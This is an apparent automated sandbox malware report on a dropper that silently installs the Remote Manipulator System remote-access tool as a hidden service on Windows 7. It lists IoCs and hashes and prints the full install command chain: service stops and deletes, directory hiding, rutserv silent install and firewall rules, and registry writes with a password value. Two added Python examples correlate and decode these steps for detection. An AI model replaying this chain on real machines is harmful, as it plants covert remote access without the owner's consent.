Analysis
-
max time kernel: 150s
max time network: 148s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 27-11-2022 15:20
Static task: static1
Behavioral task: behavioral1
Sample: 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Resource: win7-20220901-en
General
-
Target: 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
Size: 3.3MB
MD5: 6627f3503fd971c24f274d670b9d6cd7
SHA1: b77b984497b6c3d1d695de6363b1b35d9a4c192e
SHA256: 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e
SHA512: cf9210fa61eb5fec5d8d3bf2ea7e22c1f2d5f54c5f80b71c4146f73a4369a3ea0e5b7489750ff6ec00fee347398d023fb8580c1a4e134932cbd3ff555b9f380a
SSDEEP: 98304:VgwRLgSX5ZcttvsdEv9eL4UezmlplRUSJLWpAh:VgOgSX/GW+1SezmXlRDRT
Malware Config
Signatures
-
Executes dropped EXE 7 IoCs
Processes:
  pid 276 data.exe
  pid 1640 rutserv.exe
  pid 1120 rutserv.exe
  pid 2016 rutserv.exe
  pid 1996 rutserv.exe
  pid 1628 rfusclient.exe
  pid 696 rfusclient.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 11 IoCs
Matches yara rule upx (the signature header for this list is missing from the page; the rule name identifies it).
Processes:
  C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
  C:\Windows\spom\rfusclient.exe
  \Windows\spom\rfusclient.exe
  \Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe
  behavioral1/memory/1628-108-0x0000000000400000-0x0000000000AE6000-memory.dmp
  \Windows\spom\rfusclient.exe
  C:\Windows\spom\rfusclient.exe
  behavioral1/memory/696-114-0x0000000000400000-0x0000000000AE6000-memory.dmp
  behavioral1/memory/1628-115-0x0000000000400000-0x0000000000AE6000-memory.dmp
  behavioral1/memory/696-117-0x0000000000400000-0x0000000000AE6000-memory.dmp
Deletes itself 1 IoCs
Processes:
  pid 1360 cmd.exe
Loads dropped DLL 7 IoCs
Processes:
  pid 1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
  pid 1936 cmd.exe (x3)
  pid 1996 rutserv.exe (x2)
  pid 1628 rfusclient.exe
Checks whether UAC is enabled 1 TTPs 1 IoCs
Processes:
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (data.exe)
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
  yara rule autoit_exe: \Users\Admin\AppData\Local\Temp\data.exe
  yara rule autoit_exe: C:\Users\Admin\AppData\Local\Temp\data.exe
  yara rule autoit_exe: C:\Users\Admin\AppData\Local\Temp\data.exe
  yara rule autoit_exe: C:\Users\Admin\AppData\Local\Temp\hide.exe
Drops file in Windows directory 64 IoCs
C:\Windows\spom receives the RMS binaries (rutserv.exe, rfusclient.exe), the AutoIT helpers (data.exe, hide.exe) and the two install scripts (uac.cmd, nouac.cmd). The remaining entries are pre-existing setup logs and .tmp files (their names carry the sandbox image's own 20220901 build date) that land in the same directory. Every entry is written by cmd.exe (pid 1936, running nouac.cmd); the one attrib.exe entry is the modification of the directory itself.
Processes:
  File opened for modification C:\Windows\spom\dd_vcredistMSI640E.txt (cmd.exe)
  File opened for modification C:\Windows\spom\lpksetup-20220901-140302-0.log (cmd.exe)
  File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561.html (cmd.exe)
  File created C:\Windows\spom\RGI24D0.tmp (cmd.exe)
  File created C:\Windows\spom\dd_vcredistMSI640E.txt (cmd.exe)
  File created C:\Windows\spom\35675940-12ea-43e6-9a29-2fde6cdfd31c.tmp (cmd.exe)
  File opened for modification C:\Windows\spom\4ced5ba9-fb64-4b4f-9d15-e20e648456ab.tmp (cmd.exe)
  File created C:\Windows\spom\ASPNETSetup_00001.log (cmd.exe)
  File created C:\Windows\spom\dd_vcredistUI640E.txt (cmd.exe)
  File opened for modification C:\Windows\spom\ose00000.exe (cmd.exe)
  File opened for modification C:\Windows\spom (attrib.exe)
  File opened for modification C:\Windows\spom\lpksetup-20220901-135651-0.log (cmd.exe)
  File opened for modification C:\Windows\spom\uac.cmd (cmd.exe)
  File opened for modification C:\Windows\spom\ASPNETSetup_00001.log (cmd.exe)
  File opened for modification C:\Windows\spom\dd_SetupUtility.txt (cmd.exe)
  File opened for modification C:\Windows\spom\java_install.log (cmd.exe)
  File opened for modification C:\Windows\spom\795ddf6f-7912-4640-8ac1-2353a7f0ea89.tmp (cmd.exe)
  File created C:\Windows\spom\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt (cmd.exe)
  File opened for modification C:\Windows\spom\dd_vcredistMSI6476.txt (cmd.exe)
  File created C:\Windows\spom\java_install.log (cmd.exe)
  File opened for modification C:\Windows\spom\java_install_reg.log (cmd.exe)
  File created C:\Windows\spom\lpksetup-20220901-140302-0.log (cmd.exe)
  File created C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561-MSI_netfx_Full_x64.msi.txt (cmd.exe)
  File opened for modification C:\Windows\spom\RDE993.tmp (cmd.exe)
  File created C:\Windows\spom\b684c365-a914-4e5f-a38a-bb5b0b40a917.tmp (cmd.exe)
  File opened for modification C:\Windows\spom\SetupExe(20220901134306790).log (cmd.exe)
  File created C:\Windows\spom\wmsetup.log (cmd.exe)
  File opened for modification C:\Windows\spom\rutserv.exe (cmd.exe)
  File opened for modification C:\Windows\spom\ASPNETSetup_00000.log (cmd.exe)
  File created C:\Windows\spom\FXSAPIDebugLogFile.txt (cmd.exe)
  File opened for modification C:\Windows\spom\hide.exe (cmd.exe)
  File created C:\Windows\spom\jawshtml.html (cmd.exe)
  File opened for modification C:\Windows\spom\RGI24D0.tmp (cmd.exe)
  File created C:\Windows\spom\ASPNETSetup_00000.log (cmd.exe)
  File opened for modification C:\Windows\spom\dd_vcredistUI640E.txt (cmd.exe)
  File created C:\Windows\spom\f337ec5d-de05-4a2e-8405-50027a596b4f.tmp (cmd.exe)
  File opened for modification C:\Windows\spom\lpksetup-20220901-135957-0.log (cmd.exe)
  File opened for modification C:\Windows\spom\nouac.cmd (cmd.exe)
  File opened for modification C:\Windows\spom\rfusclient.exe (cmd.exe)
  File created C:\Windows\spom\uac.cmd (cmd.exe)
  File created C:\Windows\spom\68c96edb-4338-4ded-8ac6-4ae2ce43119b.tmp (cmd.exe)
  File opened for modification C:\Windows\spom\68c96edb-4338-4ded-8ac6-4ae2ce43119b.tmp (cmd.exe)
  File created C:\Windows\spom\lpksetup-20220901-135047-0.log (cmd.exe)
  File created C:\Windows\spom\lpksetup-20220901-135352-0.log (cmd.exe)
  File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561.html (cmd.exe)
  File created C:\Windows\spom\ose00000.exe (cmd.exe)
  File created C:\Windows\spom\RGI24D0.tmp-tmp (cmd.exe)
  File opened for modification C:\Windows\spom\35675940-12ea-43e6-9a29-2fde6cdfd31c.tmp (cmd.exe)
  File created C:\Windows\spom\dd_vcredistMSI6476.txt (cmd.exe)
  File created C:\Windows\spom\dd_vcredistUI6476.txt (cmd.exe)
  File created C:\Windows\spom\dd_wcf_CA_smci_20220901_133528_724.txt (cmd.exe)
  File opened for modification C:\Windows\spom\e2431e2a-8066-4d94-bbc3-b73a76ab1f0f.tmp (cmd.exe)
  File opened for modification C:\Windows\spom\FXSAPIDebugLogFile.txt (cmd.exe)
  File opened for modification C:\Windows\spom\jawshtml.html (cmd.exe)
  File opened for modification C:\Windows\spom\Admin.bmp (cmd.exe)
  File created C:\Windows\spom\java_install_reg.log (cmd.exe)
  File opened for modification C:\Windows\spom\lpksetup-20220901-135352-0.log (cmd.exe)
  File opened for modification C:\Windows\spom\Microsoft .NET Framework 4.7.2 Setup_20220901_133503561-MSI_netfx_Full_x64.msi.txt (cmd.exe)
  File created C:\Windows\spom\RDE993.tmp (cmd.exe)
  File created C:\Windows\spom\rfusclient.exe (cmd.exe)
  File opened for modification C:\Windows\spom\RGI24D0.tmp-tmp (cmd.exe)
  File created C:\Windows\spom\rutserv.exe (cmd.exe)
  File created C:\Windows\spom\data.exe (cmd.exe)
  File opened for modification C:\Windows\spom\f337ec5d-de05-4a2e-8405-50027a596b4f.tmp (cmd.exe)
Launches sc.exe 2 IoCs
sc.exe is a Windows utility to control services on the system; here it removes the vendor's own service names before reinstalling.
Processes:
  pid 1356 sc.exe
  pid 1552 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The signature's stock description calls this likely ransomware behaviour; nothing else in this report supports that reading for this sample (no mass file modification outside C:\Windows\spom, no encryption, no ransom note). What the report does show is the silent installation of Remote Manipulator System (rutserv.exe / rfusclient.exe) as a service.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
  pid 1640 rutserv.exe (x4)
  pid 1120 rutserv.exe (x2)
  pid 2016 rutserv.exe (x2)
  pid 1996 rutserv.exe (x4)
  pid 1628 rfusclient.exe
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
  Token: SeDebugPrivilege, pid 1640 rutserv.exe
  Token: SeDebugPrivilege, pid 2016 rutserv.exe
  Token: SeTakeOwnershipPrivilege, pid 1996 rutserv.exe
  Token: SeTcbPrivilege, pid 1996 rutserv.exe (x2)
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
  pid 276 data.exe (x3)
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
  pid 276 data.exe (x3)
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
  pid 1640 rutserv.exe
  pid 1120 rutserv.exe
  pid 2016 rutserv.exe
  pid 1996 rutserv.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  (parent pid / image -> target pid / image, number of writes)
  1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe -> 276 data.exe (x4)
  1468 408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe -> 1360 cmd.exe (x4)
  276 data.exe -> 1936 cmd.exe (x4)
  1936 cmd.exe -> 464 net.exe (x4)
  464 net.exe -> 1136 net1.exe (x4)
  1936 cmd.exe -> 524 net.exe (x4)
  524 net.exe -> 1404 net1.exe (x4)
  1936 cmd.exe -> 1552 sc.exe (x4)
  1936 cmd.exe -> 1356 sc.exe (x4)
  1936 cmd.exe -> 1672 reg.exe (x4)
  1936 cmd.exe -> 1556 attrib.exe (x4)
  1936 cmd.exe -> 1640 rutserv.exe (x7)
  1936 cmd.exe -> 1120 rutserv.exe (x7)
  1936 cmd.exe -> 1908 reg.exe (x4)
  1936 cmd.exe -> 756 reg.exe (x2)
Views/modifies file attributes 1 TTPs 1 IoCs
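The signatures above (net stop / sc delete of the vendor service names, reg delete of the RMS key, attrib +s +h on the drop directory, rutserv.exe /silentinstall, /firewall and /start, REG ADD of the server parameters) are all children of one cmd.exe instance running nouac.cmd, which is what makes the chain easy to correlate in process-creation telemetry. The Python below is an added example, not part of this report: it groups indicator hits by parent PID and flags a parent once several distinct steps of the install chain appear under it. The events are constructed from this report's process tree; the parent PID of data.exe and the PID of the "/start" instance (2016, taken from the Executes dropped EXE list) are assumptions, and the last event is a benign control.

```python
"""Correlate the RMS (Remote Manipulator System) silent-install chain from this
report in process-creation telemetry.  Added example, not part of the report."""
import re
from collections import defaultdict

# (indicator name, pattern over the lower-cased command line).  Each pattern is
# one step of the nouac.cmd stage shown in the report.
INDICATORS = [
    ("stop_rms_service", re.compile(r"\bnet1?\s+stop\s+(rmanservice|netaservice)\b")),
    ("delete_rms_service", re.compile(r"\bsc\s+delete\s+(rmanservice|netaservice)\b")),
    ("wipe_rms_regkey", re.compile(r'reg\s+delete\s+"hklm\\system\\remote manipulator system"')),
    ("hide_install_dir", re.compile(r"\battrib\s+\+s\s+\+h\b")),
    ("rutserv_silentinstall", re.compile(r'rutserv\.exe"?\s+/silentinstall')),
    ("rutserv_firewall", re.compile(r'rutserv\.exe"?\s+/firewall')),
    ("write_rms_params", re.compile(
        r'reg\s+add\s+"hklm\\system\\remote manipulator system\\v4\\server\\parameters"')),
    ("rutserv_start", re.compile(r'rutserv\.exe"?\s+/start')),
]

# Constructed from the report's process tree (PIDs and command lines as shown).
# The ppid of data.exe and the pid of the "/start" instance are assumptions.
SAMPLE_EVENTS = [
    {"pid": 276, "ppid": 1468, "image": "data.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\data.exe"'},
    {"pid": 1936, "ppid": 276, "image": "cmd.exe", "cmdline": "cmd /c nouac.cmd"},
    {"pid": 464, "ppid": 1936, "image": "net.exe", "cmdline": "net stop netaservice"},
    {"pid": 1136, "ppid": 464, "image": "net1.exe",
     "cmdline": r"C:\Windows\system32\net1 stop netaservice"},
    {"pid": 524, "ppid": 1936, "image": "net.exe", "cmdline": "net stop rmanservice"},
    {"pid": 1404, "ppid": 524, "image": "net1.exe",
     "cmdline": r"C:\Windows\system32\net1 stop rmanservice"},
    {"pid": 1552, "ppid": 1936, "image": "sc.exe", "cmdline": "sc delete rmanservice"},
    {"pid": 1356, "ppid": 1936, "image": "sc.exe", "cmdline": "sc delete netaservice"},
    {"pid": 1672, "ppid": 1936, "image": "reg.exe",
     "cmdline": r'reg delete "HKLM\SYSTEM\Remote Manipulator System" /f'},
    {"pid": 1556, "ppid": 1936, "image": "attrib.exe",
     "cmdline": r'attrib +s +h "C:\Windows\spom"'},
    {"pid": 1640, "ppid": 1936, "image": "rutserv.exe", "cmdline": '"rutserv.exe" /silentinstall'},
    {"pid": 1120, "ppid": 1936, "image": "rutserv.exe", "cmdline": '"rutserv.exe" /firewall'},
    {"pid": 1908, "ppid": 1936, "image": "reg.exe",
     "cmdline": r'REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" '
                r'/f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"'},
    {"pid": 2016, "ppid": 1936, "image": "rutserv.exe", "cmdline": '"rutserv.exe" /start'},
    # Benign control (constructed): a single indicator on its own must not trigger.
    {"pid": 3001, "ppid": 3000, "image": "attrib.exe",
     "cmdline": r'attrib +s +h "C:\Users\Admin\private"'},
]


def find_rms_install_chains(events, min_indicators=3):
    """Group indicator hits by parent PID.  Returns
    {ppid: {"parent": parent cmdline, "indicators": [names]}} for every parent
    whose direct children hit at least min_indicators distinct indicators."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = defaultdict(set)
    for ev in events:
        cmdline = ev["cmdline"].lower()
        for name, pattern in INDICATORS:
            if pattern.search(cmdline):
                hits[ev["ppid"]].add(name)
    return {
        ppid: {"parent": by_pid.get(ppid, {}).get("cmdline", "<not in telemetry>"),
               "indicators": sorted(names)}
        for ppid, names in hits.items()
        if len(names) >= min_indicators
    }


if __name__ == "__main__":
    for ppid, chain in find_rms_install_chains(SAMPLE_EVENTS).items():
        print(f"parent pid {ppid} ({chain['parent']}): {', '.join(chain['indicators'])}")
```

Keying on the parent rather than on any single child is what keeps the rule quiet: `net stop`, `sc delete` and `attrib +s +h` are each common on their own, and the net1.exe grandchildren only ever contribute one indicator to their own parent. The threshold of three distinct steps is a starting point; on the report's chain all eight fire under pid 1936.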
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe
    "C:\Users\Admin\AppData\Local\Temp\408d9d2fecc5ef52dc230bc50664cbcab28b97000b22e10c55b3b7cec4fbf34e.exe"
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\data.exe
      "C:\Users\Admin\AppData\Local\Temp\data.exe"
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd /c nouac.cmd
        - Loads dropped DLL
        - Drops file in Windows directory
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net.exe
          net stop netaservice
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop netaservice
      [4] C:\Windows\SysWOW64\net.exe
          net stop rmanservice
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop rmanservice
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete rmanservice
          - Launches sc.exe
      [4] C:\Windows\SysWOW64\sc.exe
          sc delete netaservice
          - Launches sc.exe
      [4] C:\Windows\SysWOW64\reg.exe
          reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
      [4] C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\spom"
          - Sets file to hidden
          - Drops file in Windows directory
          - Views/modifies file attributes
      [4] C:\Windows\spom\rutserv.exe
          "rutserv.exe" /silentinstall
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
      [4] C:\Windows\spom\rutserv.exe
          "rutserv.exe" /firewall
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "notification" /t REG_BINARY /d [binary value not preserved on this page]
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "UserAccess" /t REG_BINARY /d [no value shown on this page]
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Password" /t REG_BINARY /d 380039004400430041004600430035004600420039004500440042003800410038003700300034003500330036003900330033003500370037003400300038004400310037004100360035003900360034003900330038004600330041003400350034003800360032003700300031003100370046004200360033003900410037003500430043003100390044003600460034003800300030004600300037003200370039003700360042003700300043004200410038003400370037003900340039003000340036004500330034003600340036003500300043004300450041004100450038003900460041004300300035003900370046003900320034 00
          (value truncated on this page; the bytes are a UTF-16LE string of hex digits, beginning 89DCAFC5FB9EDB8A8704536933577408)
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00660061006c00730065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
          (BOM-prefixed UTF-16LE XML: <rms_internet_id_settings version="60004"> with internet_id empty, use_inet_connection false, inet_server empty, use_custom_inet_server false, inet_id_port 5655, use_inet_id_ipv6 false)
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "Options" /t REG_BINARY /d [binary value not preserved on this page]
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Windows\spom\rfusclient.exe"
      [4] C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d [binary value not preserved on this page]
      [4] C:\Windows\spom\rutserv.exe
          "rutserv.exe" /start
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
  [2] C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      - Deletes itself
[1] C:\Windows\spom\rutserv.exe
    C:\Windows\spom\rutserv.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
  [2] C:\Windows\spom\rfusclient.exe
      C:\Windows\spom\rfusclient.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
    [3] C:\Windows\spom\rfusclient.exe
        C:\Windows\spom\rfusclient.exe /tray
        - Executes dropped EXE
  [2] C:\Windows\spom\rfusclient.exe
      C:\Windows\spom\rfusclient.exe /tray
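The REG ADD lines in the tree write the server configuration as REG_BINARY values, but they are not opaque: the bytes are UTF-16LE text (InternetId with a BOM, holding a small XML document), so the settings can be read straight from the command line or from a captured SYSTEM hive. The Python below is an added example, not part of this report. It embeds the InternetId value copied verbatim from the command line above (the trailing "4" on that page line is the tree-depth marker, not data) and only the first 128 hex digits of the Password value, because the page truncates the rest; it decodes both and parses the XML into the fields an investigator wants (relay mode, port).

```python
r"""Decode the REG_BINARY values that nouac.cmd writes under
HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters.
Added example, not part of the report.  Hex strings below are copied from the
report's REG ADD command lines; the Password value is only the prefix the
report shows (first 128 hex digits)."""
import re
import xml.etree.ElementTree as ET

# InternetId, complete, as written by reg.exe (split only for line length).
INTERNET_ID_HEX = (
    "fffe"                                                    # UTF-16LE BOM
    "3c003f0078006d006c002000"                                # <?xml
    "760065007200730069006f006e003d00220031002e00300022002000"
    "65006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e00"
    "0d000a00"
    "3c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000"
    "760065007200730069006f006e003d0022003600300030003000340022003e00"
    "3c0069006e007400650072006e00650074005f00690064003e00"
    "3c002f0069006e007400650072006e00650074005f00690064003e00"
    "3c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00"
    "660061006c0073006500"
    "3c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e00"
    "3c0069006e00650074005f007300650072007600650072003e00"
    "3c002f0069006e00650074005f007300650072007600650072003e00"
    "3c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00"
    "660061006c0073006500"
    "3c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00"
    "3c0069006e00650074005f00690064005f0070006f00720074003e00"
    "3500360035003500"
    "3c002f0069006e00650074005f00690064005f0070006f00720074003e00"
    "3c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00"
    "660061006c0073006500"
    "3c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e00"
    "3c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e00"
    "0d000a00"
)

# Password: first 128 hex digits of the (truncated) value from the report.
PASSWORD_HEX_PREFIX = (
    "38003900440043004100460043003500460042003900450044004200380041003800"
    "370030003400350033003600390033003300350037003700340030003800"
)


def decode_utf16_value(hex_data: str) -> str:
    """REG_BINARY payload -> text.  RMS stores these as UTF-16LE strings, some
    with a leading BOM (ff fe) and some NUL-terminated; strip both."""
    raw = bytes.fromhex(hex_data)
    if raw.startswith(b"\xff\xfe"):
        raw = raw[2:]
    return raw.decode("utf-16-le").rstrip("\x00")


def parse_internet_id_settings(hex_data: str) -> dict:
    """Parse the InternetId XML into {'version': ..., '<child tag>': text}."""
    text = decode_utf16_value(hex_data)
    # Drop the <?xml ... encoding="UTF-16LE"?> declaration: the text is already
    # decoded, so the declared encoding no longer applies.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", text).strip()
    root = ET.fromstring(body)
    settings = {"version": root.get("version", "")}
    for child in root:
        settings[child.tag] = (child.text or "").strip()
    return settings


def relay_mode(settings: dict) -> str:
    """Summarise how the server expects to be reached, from the parsed fields."""
    if settings.get("use_inet_connection") == "false" and not settings.get("internet_id"):
        return "Internet-ID relay off, no ID assigned"
    return f"Internet-ID relay on, id={settings.get('internet_id')!r}"


if __name__ == "__main__":
    s = parse_internet_id_settings(INTERNET_ID_HEX)
    print(s)
    print(relay_mode(s), "port", s["inet_id_port"])
    print("Password value decodes to hex digits:", decode_utf16_value(PASSWORD_HEX_PREFIX))
```

The same decoder applies to a live host: export the key with reg.exe or read it from the SYSTEM hive, feed the hex of each REG_BINARY value to `decode_utf16_value`, and compare the result with the values in this report before treating a stray "Remote Manipulator System" key as this installer's work.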
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize: 300B
MD5: a47e0180694389aee99b8e5593d5dced
SHA1: 925927658ea434258d2e26e8a8aa49a063376076
SHA256: 784e908ccad4e77d92be78cc2be0f502d29d0cf6e65331b56720cf0e5ad8b195
SHA512: 5d03369ccc1056b50609698d103c4f8694842a29329dccab7fd443af790c2575fd8a1877f78b58f136a428faa6375c51a74f56ab7eded219a58e7e4aef678c41
-
C:\Users\Admin\AppData\Local\Temp\data.exe
Filesize: 819KB
MD5: 71a944406c89ab321cb1e55c37916d70
SHA1: be6ee2015475bdc1a665b1e6b86e86fcc1025c91
SHA256: 4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96
SHA512: 9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda
-
C:\Users\Admin\AppData\Local\Temp\hide.exe
Filesize: 819KB
MD5: 72cc4ab6ee23c79bbeed4c4d7b31f741
SHA1: a5598acb794ebbbad6c0819c20f6f7ed99541e89
SHA256: 5be7bb92afe804aa0eaac077f5527f9710c5a3ebd6a7c898d810d3d0388ecf73
SHA512: 4840b26abe306cdd05694eb8f0f750e451d83cdb4787b5539d730645ce66b2915b422f9e6be4a22885929fffb3c4b5bb50d9ffa8454045a11b55277c611eabf5
-
C:\Users\Admin\AppData\Local\Temp\nouac.cmd
Filesize: 10KB
MD5: 6786599aff4e8eb99164bdcbd3e7397b
SHA1: be5daca8309b33310a59d253876ae49e4f26f3d7
SHA256: ccc3c629937f5e26cf78de269feb5739cb2d859ab099312a8089afd98a1b2748
SHA512: 5925c7227cacf2a26a26a79e49b4b6aeacda862ef2fff7c879e679f5ee5e0fc87bf33cb0d8b5681b570977bf9d415dbfd2ec31c6fe4a03b90af47fe3a7e8e783
-
C:\Users\Admin\AppData\Local\Temp\rfusclient.exe
Filesize: 1.8MB
MD5: 3afec4347159849e4ef50d179ff1fed7
SHA1: 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256: 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512: aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Users\Admin\AppData\Local\Temp\rutserv.exe
Filesize: 6.3MB
MD5: 93a4649d70ce76d6815874fc7a72c6fb
SHA1: 1e9f663fd9cb66140001847849ddf0451365233f
SHA256: 6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203
SHA512: a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3
-
C:\Users\Admin\AppData\Local\Temp\uac.cmd
Filesize: 10KB
MD5: 09bf5a799d46c218ee4d99b9083800ac
SHA1: 05927f2aa870eefc12c2883600502e6ed2ff37e5
SHA256: 4cbdb4d4bad628128557ff0625f7ecc73801f5ed2324d731c1c70c70ea469e96
SHA512: 244a992bb21053ee9045df6f4d6f82d1119859d145c0867badbb1f4af1dd38bfd7105fb0584199098663a019b29db74b649279c946a75b48646707bedbdd4654
-
C:\Windows\spom\rfusclient.exe
Filesize: 1.8MB
MD5: 3afec4347159849e4ef50d179ff1fed7
SHA1: 9b3e00d0a426c622ddc34fbee96595d41bd8db72
SHA256: 7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f
SHA512: aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4
-
C:\Windows\spom\rutserv.exe
Filesize: 6.3MB
MD5: 93a4649d70ce76d6815874fc7a72c6fb
SHA1: 1e9f663fd9cb66140001847849ddf0451365233f
